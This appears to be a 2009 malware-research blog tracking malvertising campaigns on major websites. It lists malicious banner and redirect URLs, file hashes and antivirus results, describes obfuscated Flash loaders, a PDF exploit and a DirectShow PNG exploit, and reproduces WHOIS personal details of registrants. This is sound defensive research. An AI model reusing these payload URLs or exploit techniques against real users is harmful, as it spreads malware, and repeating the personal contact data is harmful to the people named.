WARNING: LetsSingIt - Swatch

Another malvertizement featuring Swatch is being displayed at LetsSingIt. The malicious banner has been acquired by LetsSingIt and is redirecting people to total-virusprotection.com.

Screenshot in situ.

Banner.

includes.letssingit.com/ads/SWATCH300x250.swf

Campaign.

cosmotraf.net/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]
crustat.com/ts/in.cgi?[*]&se=[*]&ur=[*]&HTTP_REFERER=wel-cmpid[*]
truconv.com/?a=[*]&s=[*]
top-name.cn/in.cgi?default&a=[*]&s=[*]
total-virusprotection.com/xpprot/3/?a=[*]&s=[*]&z=[*]

Warning: blogads.com - Ebay

A new malvertizement featuring Ebay is currently being distributed via blogads.com.

Ebay 300x250

Ebay 728x90

Ebay 160x600

Campaign

All malicious banners are using the same redirects.

statcluster.com/crossdomain.xml
statcluster.com/c/index.php?id=[*]
enjoyspringtime.com/?cmpid=[*]&subaff=[*]
crustat.com/ts/in.cgi?[*]&se=[*]&ur=[*]&HTTP_REFERER=[*]
justwebsecurity.com/[*]

IP details

statcluster.com - 174.37.196.175

Updated Date: 16-apr-2009
Creation Date: 03-apr-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.STATCLUSTER.COM - NS2.STATCLUSTER.COM

enjoyspringtime.com - 38.99.168.101

Updated Date: 17-apr-2009
Creation Date: 20-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET

crustat.com - 94.76.213.234

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET

justwebsecurity.com - 91.212.65.55

Updated Date: 20-apr-2009
Creation Date: 20-apr-2009
Registrar: REGTIME LTD.
Name Server: NS1.JUSTWEBSECURITY.COM - NS2.JUSTWEBSECURITY.COM

Registrant:
Rene Clay
Email: RenePClay@text2re.com
Organization: Private person
Address: 1555 Lake Floyd Circle
City: Chevy Chase
State: MD
ZIP: 20815
Country: US
Phone: +1.3019415618

Warning: Malvertizement ft. Toshiba

A new malicious banner ft. Toshiba is being distributed by celebritiesfans.com

Banner

celebritiesfans.com/banner728x90.swf

Campaign

statcluster.com/c/index.php?id=[*]
enjoyspringtime.com/?cmpid=[*]

HTML ActiveX Object Error

Today I ran into a strange message box being displayed while viewing Google images ... HTML ActiveX Object Error ... don't be fooled, it's yet another trick to push a rogue antivirus progam on your computer.

A quick look at the network captures reveals a 302 redirect.

But why are we getting redirected to blackporn1.com or blackpornmix.com? The answer is simple, the htaccess files on those websites have been hacked.

From blackporn1.com or blackpornmix.com we bump to tubeontvgl.com and uploadmoviez.com. Interesting point ... win-pc-defender.com, uploadmoviez.com and tubeontvgl.com share the same IP. blackpornmix.com has already been caught in htaccess hacks back in March 2009 - Ref.

Needless to say that the redirect will happen from other search engines too as seen below.

codec.exe.

Additional information
File size: 106499 bytes
MD5...: 9a6d60840a24cc36af6436622275387b
SHA1..: 2e37689944f1dc26dbf058037e855568d422e158
SHA256: e26a8b03dcf2ae9a7fe27fe936d9a8c984d4fec0ff21eefc86ddba643079d7ec
PEiD..: -

ThreatExpert info.

File codec.exe received on 04.27.2009 17:08:02 (CET)

QUOTE

a-squared 4.0.0.101 2009.04.27 Trojan-Downloader.Win32.FakeRean!IK
AhnLab-V3 5.0.0.2 2009.04.27 Dropper/Agent.106499
AntiVir 7.9.0.156 2009.04.27 TR/Dldr.FakeRean.8
Antiy-AVL 2.0.3.1 2009.04.27 -
Authentium 5.1.2.4 2009.04.26 -
Avast 4.8.1335.0 2009.04.26 Win32:Trojan-gen {Other}
AVG 8.5.0.287 2009.04.27 SHeur2.ACOF
BitDefender 7.2 2009.04.27 -
CAT-QuickHeal 10.00 2009.04.27 (Suspicious) - DNAScan
ClamAV 0.94.1 2009.04.27 -
Comodo 1137 2009.04.27 -
DrWeb 4.44.0.09170 2009.04.27 -
eSafe 7.0.17.0 2009.04.27 Win32.TrojanDownload
eTrust-Vet 31.6.6478 2009.04.27 -
F-Prot 4.4.4.56 2009.04.27 -
F-Secure 8.0.14470.0 2009.04.27 Trojan-Dropper.Win32.Agent.ankj
Fortinet 3.117.0.0 2009.04.27 W32/Agent.SR!tr.dldr
GData 19 2009.04.27 Win32:Trojan-gen {Other}
Ikarus T3.1.1.49.0 2009.04.27 Trojan-Downloader.Win32.FakeRean
K7AntiVirus 7.10.717 2009.04.27 -
Kaspersky 7.0.0.125 2009.04.27 Trojan-Dropper.Win32.Agent.ankj
McAfee 5597 2009.04.26 -
McAfee+Artemis 5597 2009.04.26 Generic!Artemis
McAfee-GW-Edition 6.7.6 2009.04.27 Trojan.Dldr.FakeRean.8
Microsoft 1.4602 2009.04.27 TrojanDownloader:Win32/FakeRean
NOD32 4036 2009.04.27 Win32/Adware.WinPCDefender
Norman 6.00.06 2009.04.27 -
nProtect 2009.1.8.0 2009.04.27 -
Panda 10.0.0.14 2009.04.27 Trj/CI.A
PCTools 4.4.2.0 2009.04.27 -
Prevx1 3.0 2009.04.27 -
Rising 21.27.02.00 2009.04.27 -
Sophos 4.41.0 2009.04.27 Mal/EncPk-HH
Sunbelt 3.2.1858.2 2009.04.24 Packer.Lighty.Gen (v)
Symantec 1.4.4.12 2009.04.27 Downloader.MisleadApp
TheHacker 6.3.4.1.315 2009.04.27 -
TrendMicro 8.700.0.1004 2009.04.27 -
VBA32 3.12.10.3 2009.04.27 -
ViRobot 2009.4.27.1710 2009.04.27 -
VirusBuster 4.6.5.0 2009.04.27 Trojan.DR.Agent.JLJP

IP details

blackporn1.com - 195.190.13.234

Updated Date: 30-mar-2009
Creation Date: 19-sep-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.CRIMENEWS.ASIA - NS2.CRIMENEWS.ASIA
Registrant: PrivacyProtect.org

blackpornmix.com - 195.190.13.234

Updated Date: 28-feb-2009
Creation Date: 19-sep-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.CRIMENEWS.ASIA - NS2.CRIMENEWS.ASIA
Registrant: PrivacyProtect.org

uploadmoviez.com - 194.165.4.77

Updated Date: 24-apr-2009
Creation Date: 24-apr-2009
Registrar: BIZCN.COM, INC.
Name Server: NS2.NAMESERVERS01.COM - NS3.NAMESERVERS01.COM

Registrant Contact: Pish Upyachka
Constantine Teplyakov constnw@gmail.com
+66 (456) 355540 fax: +66 (456) 456456
My adress str
Pattaya Chon Buri 10152
th

tubeontvgl.com - 194.165.4.77

Updated Date: 24-apr-2009
Creation Date: 24-apr-2009
Registrar: BIZCN.COM, INC.
Name Server: NS2.NAMESERVERS01.COM - NS3.NAMESERVERS01.COM

Registrant Contact: Constantine Teplyakov constnw@gmail.com
+66 (456) 355540 fax: +66 (456) 456456
My adress str
Pattaya Chon Buri 10152
th

win-pc-defender.com - 194.165.4.77

Updated Date: 06-apr-2009
Creation Date: 15-mar-2009
Registrar: BIZCN.COM, INC.
Name Server: NS2.NAMESERVERS01.COM - NS3.NAMESERVERS01.COM

Registrant Contact: Nexton Limited
Sergey Ryabov director@climbing-games.com
+79219270961 fax:
Scherbakova st., 6-38
Saint-Petersburg Saint-Petersburg 197375
ru

My adress str in the whois details ... ya gotta be joking.

Warning: www.wwe.com - HP

A malvertizement ft. HP is displayed at www.wwe.com, the official site of World Wrestling Entertainment. The malicious banner is identical as those discovered at guardian.co.uk and electronicsnews.com.au but located on a different server.

Screenshot in situ.

Banner.

m1.2mdn.net/989589/hp_728x90.swf

Campaigns.

ydmstats.com/c/index.php?id=[*]
measurehits.com/?cmpid=[*]&subaff=[*]

Warning: www.bestvenues.com.au & www.motogp.com - HP

A malvertizement ft. HP is being displayed at www.bestvenues.com.au by DoubleClick. It's the same malicious banner as discovered earlier at the official site of World Wrestling Entertainment www.wwe.com. The malvertizement is again located on a "different server".

Screenshot in situ.

Banner.

m1.au.2mdn.net/989589/hp_728x90.swf

______________________________

Double trouble for www.motogp.com ...

Banners.

m1.emea.2mdn.net/989589/hp_728x90.swf
m1.emea.2mdn.net/989589/hp_300x250.swf

Warning: comcast.vehix.com - BestWestern

DoubleClick busted again ... 2 malvertizements ft. BestWestern are displayed at comcast.vehix.com.

Screenshot in situ.

Banners.

m1.2mdn.net/2198329/bestwestern728x90-new.swf



m1.2mdn.net/2198329/bestwestern300x250-new.swf

Campaigns.

cosmotraf.net/c/index.php?id=[*]
pleaselinkmeto.com/?cmpid=[*]&url=bestwestern&id=[*]

cosmotraf.net - 88.198.8.15

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET

pleaselinkmeto.com - 212.117.165.128

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET

Warning: www.ifood.tv - Classmates

A malvertizement ft. Classmates is displayed at www.ifood.tv.

Screenshot in situ.

Banner.

m1.2mdn.net/2282252/classmates300x250.swf

Campaign.

hitoptimist.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]&url=[*]
crustat.com/ts/in.cgi?[*]&se=[*]&ur=[*]&HTTP_REFERER=[*]
truconv.com/?a=[*]&s=[*]
total-virusprotection.com/xpprot/2/?a=[*]&s=[*]

I have the impression that DoubleClick's vigilance is going downhill lately. This is the fourth malicious banner being discovered since April 10 2009 on high frequented websites.

1. April 10: Rhapsody
2. April 28: HP
3. May 1: BestWestern

One can easily imagine how many people got infected in the past month by rogue antivirus products such as Antivirus 360 / 2009 / 2010, TotalVirusProtection etc ... especially if they use flash files to force downloads on peoples computers as seen below and because advertising companies release their attention again in the checking process of creatives.

Load.swf takes 2 parameters transmitted in the URL, t and u which represents the location of a download php script.

justwebsecurity.com/load.swf?&p=0&t=_self&u=download.php?affid=[*]

Oh .. btw, a 468x60 version of the malvertizement ft. Classmates is present on the DoubleClick servers ... it's actually listed as being the 728x90 banner size but its real size is 468x60. Surprised? I'm not ...

m1.2mdn.net/2282252/classmates728x90.swf

Warning: www.fitnessmagazine.com - Classmates

Remember I did highlight the existence of a horizontal malicious banner hosted at DoubleClick earlier today? The malvertizement is being served at www.fitnessmagazine.com and www.ifood.tv.

www.fitnessmagazine.com.

www.ifood.tv.

Banner.

m1.2mdn.net/2282252/classmates728x90.swf

Campaign.

hitoptimist.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]&url=[*]

Warning: www.bhg.com - Classmates

The 300x250 version of the malvertizement ft. Classmates is displayed at Better Homes & Gardens - www.bhg.com.

Screenshot in situ.

Banner.

m1.2mdn.net/2282252/classmates300x250.swf

Campaign.

hitoptimist.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]&url=[*]

Warning: Gilmours Media - gilmoursmedia.com

Gilmours Media has been caught distributing malvertizements. Full Story by Sandi.

Gilmours Media has also advertised themselves on AdRoll and this simple fact does reveal some other interesting points to meditate about.

As seen on the screenshot below, they associate themselves with BioTrainer Weight Loss System - biotrainerusa.com - and regular readers will remember that we discovered several malicious banners featuring BioTrainer in the past. References here, here and here.

Furthermore the link Public Relations/Media at the bottom of the webpage not only goes to another domain - www.biotrainer.info - but reveals some interesting "behavior" too.

Succesive visits bring us a new page each time ...

Network capture shows us that we are visiting a search portal called searchportal.information.com

IP details

biotrainerusa.com - 68.178.206.224

Registrar: GODADDY.COM, INC.
Name Server: NS.BIOTRAINERWEB.COM - NS1.BIOTRAINERWEB.COM
Updated Date: 13-oct-2008
Creation Date: 02-dec-2004
Registrant: Domains by Proxy, Inc.
______________________________

www.biotrainer.info - 208.73.210.121

Created On:16-Jun-2005 03:40:15 UTC
Last Updated On:13-Apr-2009 22:41:47 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Name Server:NS1.DSREDIRECTION.COM - Name Server:NS2.DSREDIRECTION.COM
Registrant Organization:Deerwood Investments, LLC
Registrant Street1:7362 Remcon Circle
Registrant City:El Paso
Registrant State/Province:Texas
Registrant Postal Code:79912
Registrant Country:US
Registrant Phone:+1.3124924577
Registrant FAX Ext.:
Registrant Email:deerwooddomains@gmail.com
______________________________

searchportal.information.com - 208.73.210.121

Registrar: NAMEKING.COM, INC.
Name Server: NS1.OVERSEE.NET - NS2.OVERSEE.NET
______________________________

Note: 208.73.210.121 is associated with a ZeuS domain. See also: ntos.exe and oembios.exe

Warning: internetnetworkads.com - Nokia

Today 2 banners have been brought to my attention for suspicious behavior / whois registration. The advertisements feature Nokia and are distributed by internetnetworkads.com. Currently there is no malicious redirect but the link inside the creatives is very typical of a rotator (see below). internetnetworkads.com is registered by DIRECTI INTERNET SOLUTIONS PVT. LTD. and the creative contains obfuscated actionscript code ... 3 reasons to threat all content from internetnetworkads.com with extreme caution.

Banner.

Links.

internetnetworkads.com/url3/in.php?id=9

www.surveyclub.com/?aip=[*]&cid=[*]

Banner.

Links.

internetnetworkads.com/url3/in.php?id=9&refer=[*]=[*]=&lang=[*]=&opsys=[*]==&mac=[*]==&xD=[*] ....

internetnetworkads.com/cmp/click.php?id=9

Note: second URL's are the click URL's.

internetnetworkads.com returns a 404 error while the cmp folder pops up a login box.

Rotator.

A rotator is a link to a "Traffic Management System" which points to different destinations when requested several times. The system remembers your IP address on the server-side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL. Usually the redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Rotators typically look like:

www.example.com/in.cgi?default
www.example.com/tds/in.cgi?1
www.example.com/sutra/in.cgi?6

IP Details

internetnetworkads.com - 94.76.213.227

Updated Date: 15-jun-2009
Creation Date: 16-apr-2009
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.REG.RU - NS2.REG.RU

Registrant:
Olivier Le Pord (shreeadarsha@gmail.com)
Unit No. 6B , 6th Floor of M-6
New Delhi
New Delhi,110001
IN
Tel. +91.2230611555
Fax. +91.2230611555

domains sharing nameservers

a-mart.ru | adao.ru | adcart.net | adman.com | afy.ru | anyavto.com | anyclassics.com | anycomedy.com | anycredits.com | anyfantastic.com | anyflirt.com | anyhorror.com | anyinform.com | anymebel.com | anymobil.com | anyoptics.com | anypersonal.com | anypolitician.com | anyseach.com | anysmi.com | baldinini.net | beautyprorus.ru | botservice.ru | coolmaskarad.com | cottage-millenium.ru | cybersquatting.ru | defense-chelny.ru | deffence.ru | dobrovoz.ru | ealbum.ru | em-service.ru | hotelhelsinki.ru | inter-line.ru | lin2world.net | loadclip.ru | mebel-ekt.ru | multimedia-catalog.ru | n-photo.ru | naraboty.com | olgafomina.ru | ooodias.ru | ostprod.ru | pomoyka.ru | reg.ru | rf-perm.ru | ribca.net | robainapalomino.com | rublewka.ru | runetovec.ru | serverx.ru | sezam-service.ru | shanson.ru | stepnpay.ru | tempru.com | tic-rus.ru | trustindesign.ru | untex-sib.ru | untouchable.name | vsecargo.ru | worldsex.ru | x4u.ru

ip numbers of nameservers

81.177.8.189 | 92.241.180.114

The email address shreeadarsha@gmail.com is also associated to ADVERTISEDCLICKS.BIZ

advertisedclicks.biz - 81.177.22.95

Domain Registration Date: Fri Feb 20 09:40:41 GMT 2009
Domain Last Updated Date: Wed Apr 22 02:49:44 GMT 2009
Sponsoring Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Registrant Name: Shree Adarsha
Registrant Organization: N/A
Registrant Address1: Singha Durbar of.3
Registrant City: Kathmandu
Registrant State/Province: Karnali
Registrant Postal Code: 3987
Registrant Country: Nepal
Registrant Country Code: NP
Registrant Phone Number: +977.14211892
Registrant Email: shreeadarsha@gmail.com

Warning: www.jbmadvertising.com - JBM Advertising

JBM Advertising has been caught distributing the Nokia malvertizement we saw a couple of days ago.

When we lookup the contact details in Google maps we stumble on another advertising agency at the same address called bfw Advertising - www.gobfw.com. bfw Advertising seems to be created in 1999. Both websites are identical and wear the same pagetitle : South Florida Advertising Agency.

www.jbmadvertising.com - 88.214.200.145

Updated Date: 22-may-2009
Creation Date: 22-may-2009
Name Server: NS0.HQHOST.NET - NS1.HQHOST.NET
Registration Service Provided By: REGNAME.BIZ
Registrant: Mr Shigetoshi Kudoh (kudohshigetoshi@googlemail.com)
1-7-8 Higashi-Kanda
Chiyoda-ku
Tokyo,6523
JP
Tel. +812.38618231

Warning: Malware distributed via Yahoo advertising network

Again Yahoo advertising didn't pay much attention when acquiring new advertising banners. All content from content.bannersulike.com - r.banner0709.com and worwink.com should be discarded immediately.

Banner.

served.antventure.com is called from an iframe on the Yahoo advertising server. From there we turn around in circles between ad.antventure.com and ad.yieldmanager.com, both Yahoo advertising servers. Finally content.bannersulike.com is called from an iframe at ad.yieldmanager.com

At content.bannersulike.com we discover a script leading us to a tracker, to the banner and to a malware download triggered from r.banner0709.com.

r.banner0709.com does forward us to worwink.com which contains an obfuscated script.

p1.php does trigger an Adobe PDF exploit while ve.png poses as an image file and loads a malicious Flash file. upm.php refers to an executable hosted at worwink.com.

Another example from content.bannersulike.com triggering the same redirects is the advertisement below for clearycontacts.com.au

IP details

content.bannersulike.com - 161.58.213.81 / 168.143.35.181

Updated Date: 13-jul-2009
Creation Date: 13-jul-2009
Registrar: GODADDY.COM, INC
Name Server: NS45.DOMAINCONTROL.COM - NS46.DOMAINCONTROL.COM

r.banner0709.com - 161.58.213.81 / 168.143.35.181

Updated Date: 29-jun-2009
Creation Date: 29-jun-2009
Registrar: GODADDY.COM, INC.
Name Server: NS37.DOMAINCONTROL.COM - NS38.DOMAINCONTROL.COM

Registrant:
Bryan Hunter
921 SW Washington St
Suite 228
Portland, Oregon 97205
United States

hostnames sharing ip with a-records

banner.yellowlinebanner.com | banners.greenlightbanner.com | modena2.securesites.net | more-banners.com | t.banner0709.com | www.more-banners.com

worwink.com - 212.95.37.186

Updated Date: 15-jul-2009
Creation Date: 15-jul-2009
Registrar: KEY-SYSTEMS GMBH
Name Server: NS1.WORWINK.COM - NS2.WORWINK.COM

content.bannersulike.com - r.banner0709.com - worwink.com

Another incident involving content.bannersulike.com, r.banner0709.com and worwink.com occured 2 days ago. This time the expedia malvertizement was displayed through the Yahoo advertising network. In meanwhile the malicious content has been pulled from the advertising server within the next hours.

Outpost Webcontrol bypassed by Flash advertisements

Due to real life issues I haven't been much around lately and this morning while catching up with the latest malware news I was surprised when I noticed that some advertisements showed up in my IE session in despite of Outpost Webcontrol being active.

Flash content is blocked by default in my OP settings since I only allow Flash for trusted websites.

The network capture shows that we are dealing with Yahoo advertising. The link to the Flash file appears in clear at the adserver, next the Flash file is delivered to us and we clearly see that the type was correctly identified by the browser / Fiddler ... e.g. Content-Type: application/x-shockwave-flash.

I can't find a valid reason why these ads haven't been picked up by the Webcontrol Module. Furthermore you would think that the string /ads.* from the the ImproveNet List would do the job but it didn't. Further examination shows that the banner size 728*90 is not even present in the default Outpost settings. Just FYI, adding the banner size to the list does not stop the advert from being displayed.

Details will be transmitted to Agnitum and hopefully this problem can be solved quickly because I'm really worried about this issue. Blocking Flash with the firewall was one of the possible solutions to protect yourself from malvertizements but where are we heading if our firewall doesn't recognize a Flash file anymore ?

bintus-bahi.cn/in2/oneComesEthics.swf

Reference: oneComesEthics.swf

QUOTE

The SWF (oneComesEthics.swf) is suspected to be malicious.

While Sandi seems unsure whether oneComesEthics.swf is malicious, a very quick analysis shows that the Flash file will request an executable from bintus-bahi.cn using the code below:

Click on the image to view the full code

Note: I left out the majority of the myarray declarations as there are over 10300 lines of them.

Link

bintus-bahi.cn/in2/update.php?id=[*]&[*]

File wjqs.exe

Virustotal Results

CAT-QuickHeal 10.00 2009.09.14 (Suspicious) - DNAScan

oneComesEthics.swf

Two days ago the detection rate was 0/41 at Virustotal, today the detection is barely better with the score of 3/41. Only 3 AV vendors pick up the malicious Flash file ... IMHO way to go in improving and speeding up the inclusion of these malicious Flash files in the definitions. View Report

BitDefender 7.2 2009.09.14 Trojan.SWF.Dropper.Gen
GData 19 2009.09.14 Trojan.SWF.Dropper.Gen
Symantec 1.4.4.12 2009.09.14 Downloader.Swif

The New York Times victim of malvertizements

Times Site Was Victim of a Malicious Ad Swap
By David F. Gallagher

The New York Times Company said on Monday that NYTimes.com was the victim of an attacker who first posed as a legitimate advertiser, then started hitting site visitors with aggressive advertisements that appeared to be warnings about viruses.
......

The incident has been covered by several websites but one site in particular did draw my attention: Anatomy of a Malware Ad on NYTimes.com

The injection script posted by the author is very similar to the attacks at MySpace, allrecipes.com and Expedia involving prolinar.com and coincidence ... also uses includes02.js. Notice the Vonage ID ... Sandi posted earlier this month about incidents involving Vonage-Inc. One domain goes, another one shows up. Unfortunately the same advertising agencies keep on making the same errors over and over again while acquiring new advertisements. I'll repeat myself again .... It is time that advertising agencies start to investigate more seriously new offers before infecting innocent users like you and me.

HeavensPunishers - hp.teamclouds.com

HeavensPunishers phpbb board has been severly compromised. A whole series of exploits start of from there. Luckily several domains didn't resolve.

Usually the compromised websites are based on the PDF / Flash flaws but this time a new element appeared: for the first time I did encounter code taking advantage of the 0-day in Microsoft DirectShow (msvidctl.dll) exploit through a malformed PNG file. Today we will thus have a closer look at the files coming from ccikudor.cn. Upon arrival we are first hit by the PDF exploit, followed by the Flash and the PNG. The script is really a pain to decode as they "scrambeled" the whole javascript by using vars instead of the real object names and did hide little bits left and right.

File theirYearsBook.pdf received on 2009.09.15 07:40:07 (UTC)

File size: 75834 bytes
MD5: a742017e862805a94f80884856d5d962
SHA1: d9c93941999e0a1547f23d65b66492b166d6d84c
SHA256: 106b05d58e21d5fe38933aed9703c64087ba0b33e9660e2c00d6dc0a2899271e
PEiD: -

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.09.15 -
AhnLab-V3 5.0.0.2 2009.09.15 -
AntiVir 7.9.1.14 2009.09.14 EXP/Pidief.fyc
Antiy-AVL 2.0.3.7 2009.09.15 Exploit/Win32.Pidief
Authentium 5.1.2.4 2009.09.15 -
Avast 4.8.1351.0 2009.09.14 -
AVG 8.5.0.412 2009.09.14 -
BitDefender 7.2 2009.09.15 Exploit.PDF-JS.Gen
CAT-QuickHeal 10.00 2009.09.14 -
ClamAV 0.94.1 2009.09.14 -
Comodo 2323 2009.09.15 -
DrWeb 5.0.0.12182 2009.09.15 -
eSafe 7.0.17.0 2009.09.14 -
eTrust-Vet 31.6.6737 2009.09.14 -
F-Prot 4.5.1.85 2009.09.14 -
F-Secure 8.0.14470.0 2009.09.15 -
Fortinet 3.120.0.0 2009.09.15 -
GData 19 2009.09.15 Exploit.PDF-JS.Gen
Ikarus T3.1.1.72.0 2009.09.15 -
Jiangmin 11.0.800 2009.09.15 -
K7AntiVirus 7.10.844 2009.09.14 -
Kaspersky 7.0.0.125 2009.09.15 -
McAfee 5741 2009.09.14 -
McAfee+Artemis 5741 2009.09.14 -
McAfee-GW-Edition 6.8.5 2009.09.15 Exploit.Pidief.fyc
Microsoft 1.5005 2009.09.15 -
NOD32 4425 2009.09.14 -
Norman 6.01.09 2009.09.14 -
nProtect 2009.1.8.0 2009.09.14 -
Panda 10.0.2.2 2009.09.14 -
PCTools 4.4.2.0 2009.09.14 -
Prevx 3.0 2009.09.15 -
Rising 21.47.11.00 2009.09.15 -
Sophos 4.45.0 2009.09.15 Mal/PDFJs-L
Sunbelt 3.2.1858.2 2009.09.15 -
Symantec 1.4.4.12 2009.09.15 -
TheHacker 6.3.4.4.404 2009.09.15 -
TrendMicro 8.950.0.1094 2009.09.15 -
VBA32 3.12.10.10 2009.09.14 -
ViRobot 2009.9.15.1936 2009.09.15 -
VirusBuster 4.6.5.0 2009.09.14 -

File byEtExact.swf received on 2009.09.15 07:38:22 (UTC)

File size: 43142 bytes
MD5: 0cb2e04706992d551c558013684cea3e
SHA1: 97587512082d6e2e390dfa5959364dfc886f0e77
SHA256: 0f0ff8bd7b223fd883636d577871487d5eabb0fbc91c83408e0d9720a822057f
PEiD: -
packers (Kaspersky): Swf2Swc

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.09.15 -
AhnLab-V3 5.0.0.2 2009.09.15 -
AntiVir 7.9.1.14 2009.09.14 -
Antiy-AVL 2.0.3.7 2009.09.15 -
Authentium 5.1.2.4 2009.09.15 -
Avast 4.8.1351.0 2009.09.14 -
AVG 8.5.0.412 2009.09.14 -
BitDefender 7.2 2009.09.15 Trojan.SWF.Dropper.Gen
CAT-QuickHeal 10.00 2009.09.14 -
ClamAV 0.94.1 2009.09.14 -
Comodo 2323 2009.09.15 -
DrWeb 5.0.0.12182 2009.09.15 -
eSafe 7.0.17.0 2009.09.14 -
eTrust-Vet 31.6.6737 2009.09.14 -
F-Prot 4.5.1.85 2009.09.14 -
F-Secure 8.0.14470.0 2009.09.15 -
Fortinet 3.120.0.0 2009.09.15 -
GData 19 2009.09.15 Trojan.SWF.Dropper.Gen
Ikarus T3.1.1.72.0 2009.09.15 -
Jiangmin 11.0.800 2009.09.15 -
K7AntiVirus 7.10.844 2009.09.14 -
Kaspersky 7.0.0.125 2009.09.15 -
McAfee 5741 2009.09.14 -
McAfee+Artemis 5741 2009.09.14 -
McAfee-GW-Edition 6.8.5 2009.09.15 -
Microsoft 1.5005 2009.09.15 -
NOD32 4425 2009.09.14 -
Norman 6.01.09 2009.09.14 -
nProtect 2009.1.8.0 2009.09.14 -
Panda 10.0.2.2 2009.09.14 -
PCTools 4.4.2.0 2009.09.14 -
Prevx 3.0 2009.09.15 -
Rising 21.47.11.00 2009.09.15 -
Sophos 4.45.0 2009.09.15 Troj/SWFLdr-D
Sunbelt 3.2.1858.2 2009.09.15 -
Symantec 1.4.4.12 2009.09.15 -
TheHacker 6.3.4.4.404 2009.09.15 -
TrendMicro 8.950.0.1094 2009.09.15 -
VBA32 3.12.10.10 2009.09.14 -
ViRobot 2009.9.15.1936 2009.09.15 -
VirusBuster 4.6.5.0 2009.09.14 -

The loading method and ActionScript code is identical as the Flash file discovered at bintus-bahi.cn. Again several arrays where used to obfuscate the code.

File evenSearchLooks.png received on 2009.09.15 07:40:31 (UTC)

File size: 211 bytes
MD5: 3cf6404d1251a2ecf132a764d94df3f5
SHA1: d89c7e2ccb851010dbe431688b49f873716cdd0e
SHA256: 6581b25e34e1bcbc70bf78f075e8cafd0e7a17744b16b48a943562b8c6ba3a2f
PEiD: -

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.09.15 -
AhnLab-V3 5.0.0.2 2009.09.15 -
AntiVir 7.9.1.14 2009.09.14 -
Antiy-AVL 2.0.3.7 2009.09.15 -
Authentium 5.1.2.4 2009.09.15 -
Avast 4.8.1351.0 2009.09.14 -
AVG 8.5.0.412 2009.09.14 -
BitDefender 7.2 2009.09.15 -
CAT-QuickHeal 10.00 2009.09.14 -
ClamAV 0.94.1 2009.09.14 -
Comodo 2323 2009.09.15 -
DrWeb 5.0.0.12182 2009.09.15 -
eSafe 7.0.17.0 2009.09.14 -
eTrust-Vet 31.6.6737 2009.09.14 -
F-Prot 4.5.1.85 2009.09.14 -
F-Secure 8.0.14470.0 2009.09.15 -
Fortinet 3.120.0.0 2009.09.15 -
GData 19 2009.09.15 -
Ikarus T3.1.1.72.0 2009.09.15 -
Jiangmin 11.0.800 2009.09.15 -
K7AntiVirus 7.10.844 2009.09.14 -
Kaspersky 7.0.0.125 2009.09.15 -
McAfee 5741 2009.09.14 -
McAfee+Artemis 5741 2009.09.14 -
McAfee-GW-Edition 6.8.5 2009.09.15 -
Microsoft 1.5005 2009.09.15 -
NOD32 4425 2009.09.14 -
Norman 6.01.09 2009.09.14 -
nProtect 2009.1.8.0 2009.09.14 -
Panda 10.0.2.2 2009.09.14 -
PCTools 4.4.2.0 2009.09.14 -
Prevx 3.0 2009.09.15 -
Rising 21.47.11.00 2009.09.15 Hack.Exploit.Win32.CVE-2008-0015.a
Sophos 4.45.0 2009.09.15 -
Sunbelt 3.2.1858.2 2009.09.15 -
Symantec 1.4.4.12 2009.09.15 -
TheHacker 6.3.4.4.404 2009.09.15 -
TrendMicro 8.950.0.1094 2009.09.15 -
VBA32 3.12.10.10 2009.09.14 -
ViRobot 2009.9.15.1936 2009.09.15 -
VirusBuster 4.6.5.0 2009.09.14 -

In the obfuscated code we do find back a reference to evenSearchLooks.png.

Once cleaned up, the code already looks way clearer.

Our evenSearchLooks.png is not a valid PNG image. It looks more like an invalid media file header that runs the shellcode.

Firefox is unable to display the image, this does not necessarily mean that Firefox users are immune to this exploit.

Shellcode.

The shellcode is one long string in the value property of a DIV element:

It is extracted using getElementById with a regular expression (regex) applied to remove the junk characters. Once cleaned up it gives escaped unicode. After getting appropriate function addresses from kernel32.dll and urlmon.dll, the code does this:


The second URLDownloadToFileA has an invalid parameter but would work if they had provided a second URL. My network traces don't have any traces of crash.php

IP details

fastreadingit.ru - 211.95.78.98

type: CORPORATE
nserver: ns1.everydns.net - ns2.everydns.net - ns3.everydns.net - ns4.everydns.net
person: Private person
phone: +7 910 3478712
e-mail: dmitrijstanislavskij@yandex.ru
registrar: REGRU-REG-RIPN
created: 2009.09.04
paid-till: 2010.09.04
______________________________

add-content-filter.info / 7addition.info / 71speed.info - NO IP

Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. dba PublicDomainRegistry.com (R159-LRMS)
Registrant Name:Vicky Chan
Registrant Street1:Flat C, 18/F., Block 39
Registrant City:Hong Kong
Registrant State/Province:Hong Kong
Registrant Postal Code:1007
Registrant Country:CN
Registrant Phone:+852.97336022
